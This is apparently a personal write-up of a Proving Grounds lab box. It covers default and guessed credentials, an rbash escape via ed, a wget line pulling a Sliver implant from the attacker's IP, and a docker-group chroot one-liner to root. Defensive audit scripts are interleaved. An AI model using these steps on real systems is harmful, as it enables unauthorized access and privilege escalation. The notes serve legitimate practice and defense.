## Enumeration

### 10000

![[Pasted image 20250324182506.png]]

```
10000/tcp open  snet-sensor-mgmt?
|_auth-owners: eleanor
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
|     HTTP/1.1 400 Bad Request
|     Connection: close
|   FourOhFourRequest:
|     HTTP/1.1 200 OK
|     Content-Type: text/plain
|     Date: Mon, 24 Mar 2025 16:42:26 GMT
|     Connection: close
|     Hello World
|   GetRequest:
|     HTTP/1.1 200 OK
|     Content-Type: text/plain
|     Date: Mon, 24 Mar 2025 16:42:19 GMT
|     Connection: close
|     Hello World
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     Content-Type: text/plain
|     Date: Mon, 24 Mar 2025 16:42:20 GMT
|     Connection: close
|_    Hello World
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
```

### WAPP - 8080 HTTP

- Runs "Redmine" (known application)
- Powered by Redmine © 2006-2020 Jean-Philippe Lang
- contains a csrf-token in the HTML header??

```
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: D316E1622C58825727E7E4E6C954D289
| http-robots.txt: 4 disallowed entries
|_/issues/gantt /issues/calendar /activity /search
|_http-server-header: WEBrick/1.4.2 (Ruby/2.6.6/2020-03-31)
|_http-title: Redmine
```

- default creds? `admin:admin`
  - much love, need to set a new password (password expired)
  - new password: `password`
- user was created on `06/01/2020`

![[Pasted image 20250324175735.png]]

**Path enumeration**

![[Pasted image 20250324180458.png]]

http://192.168.226.60:8080/settings?tab=repositories

![[Pasted image 20250324212749.png]]

![[Pasted image 20250324212903.png]]

- attempting to create a new project at http://192.168.226.60:8080/projects/new causes a timeout...
- can create a new tracker: http://192.168.226.60:8080/trackers

### SSH

...

## Foothold

- took a hint here: `Be sure to fully enumerate all TCP ports. One of the services will reveal a username. Try guessing their password.`
- the `|_auth-owners: eleanor` line in the port 10000 scan above is that username: nmap's `auth-owners` script asks the identd service (the listener on port 113 seen in the `ss` output below) which local user owns each connection
- apparently we should bruteforce ssh lol
- ended up looking at the solution here, apparently we need to login with `eleanor:eleanor`

---

## Privesc

- we authenticate and see that we have mail?
- we are stuck in restricted `rbash`

### Breaking out of `rbash`

```
eleanor@peppo:~$ export -p
declare -x HOME="/home/eleanor"
declare -x LANG="en_US.UTF-8"
declare -x LOGNAME="eleanor"
#================================================
declare -x MAIL="/var/mail/eleanor"   # <==========
#================================================
declare -x OLDPWD
declare -rx PATH="/home/eleanor/bin"
declare -x PWD="/home/eleanor"
declare -rx SHELL="/bin/rbash"
declare -x SHLVL="1"
declare -x SSH_CLIENT="192.168.45.231 52096 22"
declare -x SSH_CONNECTION="192.168.45.231 52096 192.168.191.60 22"
declare -x SSH_TTY="/dev/pts/0"
declare -x TERM="xterm-256color"
declare -x USER="eleanor"
declare -x XDG_RUNTIME_DIR="/run/user/1000"
declare -x XDG_SESSION_ID="3"
```

We note that `/home/eleanor/bin` is the only entry on `PATH` (and `PATH` is declared read-only, `-rx`), and we can list the files in it:

```sh
eleanor@peppo:~$ echo $PATH
/home/eleanor/bin
eleanor@peppo:~$ ls bin
chmod  chown  ed  ls  mv  ping  sleep  touch
```

We can leverage `ed` to read a file now:

```
eleanor@peppo:~$ ed local.txt
33
,p
1f6226d397240b2f5ea28209e535557e
```

`ed` is listed on [gtfobins.com](https://gtfobins.github.io/gtfobins/ed/) and can be used to break out of restricted environments <3

```
eleanor@peppo:~$ ed
!/bin/sh
$ whoami
/bin/sh: 1: whoami: not found
$ pwd
/home/eleanor
```

We're still missing access to most of the standard Unix tooling, so let's attempt to set a more inclusive `PATH` environment (the read-only attribute only applied inside the `rbash` process; the `/bin/sh` we spawned from `ed` has no such restriction):

```
$ export PATH=$PATH:/user/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
$ echo $PATH
/home/eleanor/bin:/user/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
$ wget
wget: missing URL
```

We can now go ahead and attempt to upgrade our access by downloading a sliver implant:

```
wget http://192.168.45.231:445/peppo -o /tmp/implant
```

The connection times out... let's do some manual enum, shall we?

**Active Procs**

```
# we're stuck inside of docker?
root       486  0.0  2.1 571420  44852 ?  Ssl  06:06  0:00 /usr/bin/containerd
root       487  0.0  3.9 525716  81576 ?  Ssl  06:06  0:00 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
# we saw this in the home dir, seems it was owned by root??
eleanor    463  0.0  1.4 564884  28856 ?  Ssl  06:06  0:00 /usr/bin/node /home/eleanor/helloworld/index.js
# likely the redmine app
999       1090  0.0  5.9 304292 122808 ?  Ssl  06:06  0:01 /usr/local/bin/ruby bin/rails server -b 0.0.0.0
```

### Nodejs application

Source file contents:

```
$ cat ./helloworld/index.js
const http = require('http');

const hostname = '0.0.0.0';
const port = 10000;

http.createServer((req, res) => {
  res.writeHead(200, { 'Content-Type': 'text/plain' });
  res.end('Hello World\n');
}).listen(port, hostname, () => {
  console.log('Server running...');
});
```

This is the "Hello World" service nmap fingerprinted on port 10000.

Open ports:

```
$ ss -tulnp
Netid  State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port
tcp    LISTEN  0       128     *:10000             *:*                users:(("node",pid=463,fd=18))
tcp    LISTEN  0       15      *:113               *:*
tcp    LISTEN  0       128     *:22                *:*
tcp    LISTEN  0       128     :::8080             :::*
tcp    LISTEN  0       128     :::22               :::*
tcp    LISTEN  0       128     :::5432             :::*
```

We attempt to kill the proc a couple of times. We observe that it restarts with a new `PID`.
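The restricted-shell section above shows the two things that made the `rbash` jail fall over: an escape-capable binary (`ed`) on the allowed `PATH`, and a `PATH` directory under the user's own home. The following audit script is an added example for defenders reviewing such a setup; it is not part of the original notes. It parses bash `export -p` output and the listing of the allowed directory (both samples below are constructed from the session above) and reports the weaknesses it finds. The `ESCAPE_CAPABLE` list is an assumed, gtfobins-style shortlist, not an exhaustive one.

```python
import re

# Assumed list (gtfobins-style): binaries that hand a restricted user an
# unrestricted shell or arbitrary file read/write when left on a restricted PATH.
ESCAPE_CAPABLE = {"ed", "vi", "vim", "less", "more", "man", "find", "awk", "perl", "python3"}

# Constructed sample, trimmed from the `export -p` output in the session above.
EXPORT_P_SAMPLE = """\
declare -x HOME="/home/eleanor"
declare -x MAIL="/var/mail/eleanor"
declare -x OLDPWD
declare -rx PATH="/home/eleanor/bin"
declare -rx SHELL="/bin/rbash"
declare -x USER="eleanor"
"""

# Constructed sample: the `ls bin` result from the session above.
BIN_LISTING_SAMPLE = "chmod chown ed ls mv ping sleep touch"

DECL_RE = re.compile(r'^declare -(?P<flags>[a-z]+) (?P<name>\w+)(?:="(?P<value>.*)")?$')


def parse_export_p(text):
    """Map variable name -> (value, is_readonly) from bash `export -p` output."""
    env = {}
    for line in text.splitlines():
        m = DECL_RE.match(line.strip())
        if m:
            # "-rx" means exported *and* read-only; "-x" alone is exported only.
            env[m["name"]] = (m["value"] or "", "r" in m["flags"])
    return env


def audit_restricted_shell(export_p_text, allowed_binaries):
    """Return (code, detail) findings; an empty list means no known weakness."""
    env = parse_export_p(export_p_text)
    findings = []

    shell, shell_ro = env.get("SHELL", ("", False))
    if shell != "/bin/rbash":
        findings.append(("SHELL_NOT_RESTRICTED", shell))
    elif not shell_ro:
        findings.append(("SHELL_WRITABLE", shell))

    path, path_ro = env.get("PATH", ("", False))
    if not path_ro:
        # rbash forbids assigning PATH, but only a read-only attribute stops
        # `declare` tricks; a writable PATH lets the user prepend a directory
        # they control and shadow every allowed command.
        findings.append(("PATH_WRITABLE", path))

    home = env.get("HOME", ("", False))[0]
    for d in path.split(":"):
        if home and d.startswith(home + "/"):
            # A PATH entry under HOME must be root-owned and not user-writable,
            # otherwise any allowed command name can be replaced with a script.
            findings.append(("PATH_UNDER_HOME", d))

    for b in allowed_binaries.split():
        if b in ESCAPE_CAPABLE:
            findings.append(("ESCAPE_CAPABLE_BINARY", b))
    return findings


if __name__ == "__main__":
    for code, detail in audit_restricted_shell(EXPORT_P_SAMPLE, BIN_LISTING_SAMPLE):
        print(f"{code}: {detail}")
```

Run against the sample it reports `PATH_UNDER_HOME` for `/home/eleanor/bin` and `ESCAPE_CAPABLE_BINARY` for `ed`, which is exactly the pair the session exploited. One caveat the script cannot check: the `-r` attribute on `PATH` and `SHELL` lives only inside that `rbash` process, so once any allowed binary spawns a different shell the restrictions are gone; the allowed set therefore has to be built from binaries that can never execute something else, not from a convenient-looking subset of `/bin`.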
The respawn with a fresh `PID` points at a supervisor process restarting it:

![[Pasted image 20250330134603.png]]

```
$ systemctl | grep node
kmod-static-nodes.service    loaded active exited   Create list of required static device nodes for the current kernel
node.service                 loaded active running  Node.js Example Server
```

```
$ cat /etc/systemd/system/node.service
[Unit]
Description=Node.js Example Server

[Service]
ExecStart=/usr/bin/node /home/eleanor/helloworld/index.js
WorkingDirectory=/home/eleanor/helloworld
Restart=always
RestartSec=10
StandardOutput=syslog
StandardError=syslog
SyslogIdentifier=nodejs-example
User=eleanor
Group=eleanor
Environment=NODE_ENV=production PORT=10000

[Install]
WantedBy=multi-user.target
```

So it turned out this was another dandy rabbit hole: the unit runs as `User=eleanor`, so editing `index.js` only gets us code execution as the user we already are.

### Docker Privesc

```
$ id
uid=1000(eleanor) gid=1000(eleanor) groups=1000(eleanor),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),999(docker)
```

We observe that we're included in the `docker` group. Having a look at https://gtfobins.github.io/gtfobins/docker/ we attempt a common docker privesc:

```
$ docker run -v /:/mnt --rm -it redmine chroot /mnt sh
# whoami
root
```

---

## Lessons Learned

- Proving Grounds will throw you some fkd rabbit holes
  - was so sure Redmine had to be the entry that it made me blind to the rest
  - was also pretty sure that SSH bruteforcing was not gonna be the way in...
- On offsec boxes, always attempt `username:username`
- Don't rely on fancy attack paths or payloads
- Practice manual privesc more
- Practice docker more
- Focus on breadth initially, rather than going down rabbit holes
- Stick with the timer, pivot after 30 minutes.
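The two privesc findings above (the `node.service` rabbit hole and the `docker` group) come down to two questions a defender can answer mechanically: does a service unit execute files owned by a user other than the one it runs as, and is the account in a root-equivalent group? The script below is an added example for that kind of local review, not code from the original notes. The `id` output and the unit file are constructed copies of the ones in the session above; `OWNER_SAMPLE` is a constructed stand-in for `os.stat()` ownership lookups so the example runs offline, and `ROOT_EQUIVALENT_GROUPS` is an assumed shortlist.

```python
import re
import shlex

# Assumed list: groups whose membership is effectively root on a typical
# Linux host. The write-up above exercises the docker case.
ROOT_EQUIVALENT_GROUPS = {
    "docker": "can start a container with / bind-mounted and chroot into it as root",
    "lxd": "can launch a privileged container with the host disk attached",
    "disk": "can read and write block devices directly, bypassing file permissions",
    "sudo": "may run commands as root depending on sudoers",
    "wheel": "may run commands as root depending on sudoers",
}

# Constructed sample: the `id` output from the session above.
ID_SAMPLE = ("uid=1000(eleanor) gid=1000(eleanor) groups=1000(eleanor),24(cdrom),25(floppy),"
             "29(audio),30(dip),44(video),46(plugdev),108(netdev),999(docker)")

# Constructed sample: the relevant lines of node.service from the session above.
UNIT_SAMPLE = """\
[Unit]
Description=Node.js Example Server

[Service]
ExecStart=/usr/bin/node /home/eleanor/helloworld/index.js
WorkingDirectory=/home/eleanor/helloworld
Restart=always
RestartSec=10
User=eleanor
Group=eleanor
Environment=NODE_ENV=production PORT=10000

[Install]
WantedBy=multi-user.target
"""

# Constructed stand-in for os.stat() ownership lookups (path -> owning user).
OWNER_SAMPLE = {"/usr/bin/node": "root", "/home/eleanor/helloworld/index.js": "eleanor"}


def parse_id_groups(id_text):
    """Return the group names from `id` output, in order."""
    m = re.search(r"groups=(\S+)", id_text)
    return re.findall(r"\d+\(([^)]+)\)", m.group(1)) if m else []


def root_equivalent_groups(id_text):
    """Names of root-equivalent groups the account belongs to."""
    return [g for g in parse_id_groups(id_text) if g in ROOT_EQUIVALENT_GROUPS]


def parse_unit(text):
    """Minimal systemd unit parser: {section: [(key, value), ...]}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, [])
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current].append((key.strip(), value.strip()))
    return sections


def assess_unit(unit_text, owner_of):
    """Flag ExecStart components owned by a non-root user other than the
    service's own User=. Such a file lets whoever controls that user run
    code as the service account on every (re)start."""
    service = dict(parse_unit(unit_text).get("Service", []))
    run_as = service.get("User", "root")  # systemd runs as root when User= is absent
    findings = []
    # Absolute tokens of ExecStart are the binary and any script arguments
    # (prefix characters such as "-" or "@" are not handled in this example).
    for token in shlex.split(service.get("ExecStart", "")):
        if not token.startswith("/"):
            continue
        owner = owner_of.get(token)
        if owner not in (None, "root", run_as):
            findings.append(("EXEC_PATH_OWNED_BY_OTHER_USER", token, owner, run_as))
    return findings


if __name__ == "__main__":
    for g in root_equivalent_groups(ID_SAMPLE):
        print(f"root-equivalent group: {g}: {ROOT_EQUIVALENT_GROUPS[g]}")
    print("unit findings:", assess_unit(UNIT_SAMPLE, OWNER_SAMPLE))
```

For the page's data the unit check comes back empty, which is the rabbit hole in one line: the script is owned by the same user the service runs as, so controlling it gains nothing. Drop the `User=eleanor` line and the same file becomes a root-level finding. The group check reports `docker`, and the fix is the boring one: remove the account from the group (or move to rootless Docker), because daemon-level Docker access is equivalent to root regardless of any restricted shell in front of it.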